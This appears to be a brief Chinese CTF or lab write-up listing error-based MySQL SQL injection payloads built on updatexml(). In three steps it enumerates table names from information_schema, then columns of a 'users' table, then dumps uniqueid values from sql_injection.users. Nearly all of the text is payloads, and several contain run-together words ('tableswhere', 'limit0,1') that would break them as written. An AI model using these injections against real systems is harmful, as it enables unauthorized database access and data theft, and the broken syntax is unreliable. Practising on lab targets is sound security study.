爆表:users 1||updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tableswhere table_schema=database()),0x7e),1)#
爆字段(列名):USER CURRENT_CONNECTIONS TOTAL_CONNECTIONS user uniqueid 1||updatexml(1,concat(0x7e,(selectcolumn_namefrom information_schema.columnswheretable_name=0x7573657273limit0,1),0x7e),1)#
由首页中回显的SELECT * FROM users WHERE uniqueid=1,提示我们要查uniqueid字段的数据 爆数据 1||updatexml(1,concat(0x7e,(select uniqueid from sql_injection.users limit0,1)),1)#